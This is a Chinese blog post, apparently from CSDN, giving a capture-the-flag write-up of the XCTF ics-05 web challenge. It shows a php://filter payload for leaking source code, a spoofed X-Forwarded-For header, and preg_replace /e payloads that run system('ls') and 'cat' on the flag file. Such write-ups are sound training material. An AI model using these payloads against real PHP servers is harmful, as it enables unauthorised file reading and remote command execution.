XCTF训练之ics-05

最新推荐文章于 2023-09-07 09:15:55 发布
原创 最新推荐文章于 2023-09-07 09:15:55 发布 · 337 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php

本文介绍了如何通过PHP伪协议获取网页源码,并利用preg_replace函数的漏洞执行命令。在分析过程中,展示了如何绕过过滤机制,通过构造特定payload来读取敏感文件并最终获得flag。

XCTF ics-05

打开题目,我们发现只有“设备维护中心”可以进入
又发现点击“云平台设备维护中心”页面多了indexurl中多了page=index
实例

查看源码,发现没有什么有用的东西
想到通过php伪协议获取index.php的源码不懂PHP伪协议点我!!

payload:?php://filter/convert.base64-encode/resource=index.php

得到源码:
源码
base64解码后得到关键php代码:

<?php
error_reporting(0);

@session_start();
posix_setuid(1000);

?>
<?php

$page = $_GET[page];

if (isset($page)) {



if (ctype_alnum($page)) {
?>

    <br /><br /><br /><br />
    <div style="text-align:center">
        <p class="lead"><?php echo $page; die();?></p>
    <br /><br /><br /><br />

<?php

}else{

?>
        <br /><br /><br /><br />
        <div style="text-align:center">
            <p class="lead">
                <?php

                if (strpos($page, 'input') > 0) {
                    die();
                }

                if (strpos($page, 'ta:text') > 0) {
                    die();
                }

                if (strpos($page, 'text') > 0) {
                    die();
                }

                if ($page === 'index.php') {
                    die('Ok');
                }
                    include($page);
                    die();
                ?>
        </p>
        <br /><br /><br /><br />

<?php
}}
//方便的实现输入输出的功能,正在开发中的功能,只能内部人员测试

if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {

    echo "<br >Welcome My Admin ! <br >";

    $pattern = $_GET[pat];
    $replacement = $_GET[rep];
    $subject = $_GET[sub];

    if (isset($pattern) && isset($replacement) && isset($subject)) {
        preg_replace($pattern, $replacement, $subject);
    }else{
        die();
    }

}
?>

可以发现过滤掉了input,所以没法通过php伪协议php://input来执行php代码

但是,我们可以注意到preg_replace函数漏洞preg_replace函数用法
触发漏洞有两个条件

  • 正则表达式(第一个参数)需要有e标识符,有了它可以执行第二个参数的命令
  • 第一个参数必须在第三个参数有匹配,不然会返回三个参数而不执行命令
payload:?pat=/test/e&rep=system('ls')&sub=test

同样通过代码审计只要需要把x-forwarded-for改为127.0.0.1,我们burpsuite抓包:
修改x-forwarded-for
发现s3chahahaDir不对劲,修改payload

?pat=/test/e&rep=system(‘ls+s3chahahaDir’)&sub=test

修改payload
注意: system括号里面不能有空格,这里用+来代替
发现flag文件夹:

payload:?pat=/test/e&rep=system('ls+s3chahahaDir/flag')&sub=test

发现flag文件夹下的flag.php

payload:?pat=/test/e&rep=system('cat+s3chahahaDir/flag/flag.php')&sub=test

最后得到flag的值

Over

【网络安全 | XCTF】攻防世界 ics-05 解题详析
等风来
05-31 5567
题目描述:其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统。在当前目录及其子目录中查找文件名中包含 xx 的文件,如。构造Payload如下,实现将sub中的。根据提示,进入维护中心页面。查看源代码 发现注入点。
xctf攻防世界 Web高手进阶区 ics-05
l8947943的博客
08-09 7645
这个题目后面不难,最难的是一开始使用php伪协议,其次是php代码审计。这儿是知识盲区,慢慢积累吧。
攻防世界-WEB-ics-05
Lucifer的专栏
09-07 443
想到文件包含漏洞(URL中出现path、dir、file、pag、page、archive、p、eng、语言文件等相关关键字眼。利用php伪协议查看源码 出现一段base64源码,进行转码得出源码。//方便的实现输入输出的功能,正在开发中的功能,只能内部人员测试。出现 Welcome My Admin!通过构建命令 找到flag文件。得到base64的内容 解密。只有设备维护中心可以点开。点标签得到新的url。
xctf-ics05
Mars748的博客
11-12 486
xctf里面的一道web题ics05 这道题给了提示:其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统 既然说了是设备维护中心的漏洞,打开设备维护中心,什么东西也没有,查看源码也没有啥东西。 这时候瞎点,点到了网页上面的导航上 云平台设备维护中心发现有变化。发现page的值会显示出来。 将page的参数改成index.php发现页面显示ok,改成其他的(比如flag.php)页面啥都没显...
xctf(web)-ics-05
i_am_not_hacker的博客
08-08 986
本题的题目描述如下图所示,查看“设备维护中心” 再查看源码,也没有找到线索,通过php伪协议查看源码 php伪协议参考文章 在题目所给的url后加 ?page=php://filter/convert.base64-encode/resource=index.php 即可查到base64加密后的源码 base64解码后,查看代码,发现后门 //方便的实现输入输出的功能,正在开发中的功能,只能内部...
xctf ics-05 wp
doudoudedi
06-18 2800
今天刚考完数据库就来刷体了很累所以做了很久 诶还是不够仔细啊没有认真的做出来 应该直接想到任意文件读取的诶 page=php://filter/read=convert.base64-encode/resource=index.php 爆出源码: <?php error_reporting(0); @session_start(); posix_setui...
XCTF ics-05
小白渣的博客
10-01 647
题目来源 攻防世界web高手进阶区ics-05XCTF 4th-CyberEarth) 1.拿到题目以后,发现是一个index.php的页面,并且设备…没有显示完全,此位置可疑。 2.源代码中发现?page=index,出现page这个get参数,联想到可能存在文件包含读源码的漏洞,尝试读取index.php的页面源码 通过php内置协议直接读取代码 /index.php?page=php://...
xctf攻防世界 Web高手进阶区 ics-07
l8947943的博客
01-01 740
1. 进入场景,查看环境 一顿狂点,项目管理可以打开,如图: 看到这个view-source,可以戳进去查看源码,如图: 2. 分析问题 这个题还是很中规中矩的,登录界面随便填写,查看url中的变化 也就是说page和id将会是解题的重要参数。 开始分析代码 <?php if (isset($_GET[page]) && $_GET[page] != 'index.php') { include('flag.php'); }else {
xctf攻防世界ics-07 wp
sash1mi
02-20 291
xctf攻防世界ics-07 wp 考察知识点:php代码审计、命令执行 访问题目地址 随便点一点,康康能发现什么 发现这里有源码 进行php代码审计 分析: 参数page存在且其值不等于index.php,才会包含flag.php 将$ con的内容写入$ file中,但文件后缀名不能为.php3/4/5/6/7/t/html $_SESSION[‘admin’] = True可以满足以上所需 此段需要满足参数id存在,id的浮点值不为’1’,id参数的最后一个数值是9 可以使用id=1-9
XCTFics-07
小白渣的博客
10-28 2415
三种解题方法 (1) 步骤 1.进入题目后,查看源码进行审计,第一步需要进行绕过,获取到admin的session。 2.绕过要注意的三个点为: ​ (1)floatval($ _ GET [id])!==‘1’ //浮点不为1 ​ (2)substr($ _ GET [id],-1)==='9‘ //id最后一位为9 ​ (3)Mysql查询结果限制,id不能过大, 3.构建后exp为http:...
XCTF-ics-05
臭nana的博客
12-09 401
打开题目,根据题目提示找到设备维护中心 点进去(其他点了都没用),没发现什么有用的东西 点击了云平台设备维护中心后,发现url后面多了点东西,页面上也多了点东西,这里就是突破口 随便改一下page后面传入的值,发现后面的东西会被打印在页面上,尝试php伪协议,构造payload如下 page=php://filter/read=convert.base64-encode/r...
攻防世界XCTFics-05
末初 · mochu7
03-06 1532
根据提示来到设备维护中心 查看源码可以发现这里隐藏了个超链接变量传参,看到变量传参,有可能存在文件包含漏洞读取源码,然后这个站又是php的站,那么使用php伪协议读取源码: ?page=php://filter/read=convert.base64-encode/resource=index.php 出现了base64编码过的源码,使用base64解码后源码如下: <?php err...
XCTFics-05
Keepb1ue的博客
01-12 1506
php伪协议 + preg_replace+/e修正符命令执行
xctf_web ics-05
fly夏天的博客
09-23 632
刚打开网站 点击各个按钮发现除了一个index页面,没有别的变化。 尝试扫描,没扫出东西,看来问题就在这个index页面上了 这里我尝试查看了源码,并没有发现啥有用的东西。 只有一个可传参的参数page。 拜读了大佬的攻略,才发现可以利用文件读写漏洞读取源码。 page=php://filter/read=convert.base64-encode/resource=index.p...
XCTF-攻防世界CTF平台-Web类——17、ics-05php://filter 协议、preg_replace函数命令执行)
Onlyone_1314的博客
01-01 3394
查看题目: 提示:其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统,可能和后门程序有关,位置在工控云管理系统的设备维护中心 打开题目地址: 查看页面源代码: 只有设备维护中心的链接点击会跳转到index.php: 显示:数据接口请求异常 再查看index.php的源代码: 在云平台设备维护中心处有一个链接?page=index 点击之后: 它以GET方式提交page变量的值为index,后端index.php处理之后返回index。 传入page=123456,返回123456 所以我
xctf-web-ics05
zhejichensha_l7l的博客
02-02 361
xctf-web-ics05 前言 这道题干什么,想要告诉我们什么。。。 瞎鸡儿分析 ics05这道题,可能是在入侵后利用管理的平台来完成一些信息的收集,所以读取他的文件并利用就非常重要 提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 这里分析可能有错,单纯个人见解 过程 刚刚开始的url是:114.200.241.243:51522/index.php 看到页面有id 好家伙我又以为是sql注入了 特别是看到这个页面 正常回显。。 其实不是 认真再看看 没啥想法可以先看看这个文
XCTF web ics-05
H4ppyD0g的博客
09-06 369
preg_replace() 函数执行一个正则表达式的搜索和替换。 mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] ) 搜索 subject 中匹配 pattern 的部分, 以 replacement 进行替换。 ...
ICS-05
weixin_52921802的博客
11-19 368
编程 一、问题求解 系统分解 将问题系统地分解成多个独立的,足够小的模块(或单元),同时要求这些小单元具备可被每个程序员独立编程实现和运行的特性,我们称该机制为“系统分解”,即一个大任务被分解成了多个子任务的集合。 三种结构:顺序、条件、循环 分解后的子任务将基于特定的“结构”有机地结合在一起,完成更大地任务目标,最常见的基本构建方法是顺序、条件和循环三种结构 顺序结构 条件结构 循环结构
攻防世界---ics-05
qq_44065556的博客
09-26 1583
点进场景看到是很炫酷的页面,题目秒速的是:系统设备维护中心的后门入侵系统,那直奔那里 进来发现什么也没有,到处点一点 在点击时, url发送了变化 出现?page=index 那么联想到可能存在利用文件包含读取网页源码的漏洞 用php内置filter伪协议读取文件的代码: ?page=php://filter/read=convert.base64-encode/resource=index.php 访问之后页面出现一大段base64编码 之后去解码得到(给出关键部分) .
web-ics-05
07-28
对于题目"web-ics-05",根据提供的引用内容,我们可以得到以下信息: - 这道题可能是在入侵后利用管理平台来完成一些信息的收集,读取文件并利用是非常重要的。\[1\] - 在源代码中有一段注释,提到要给HTTP头部添加X...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值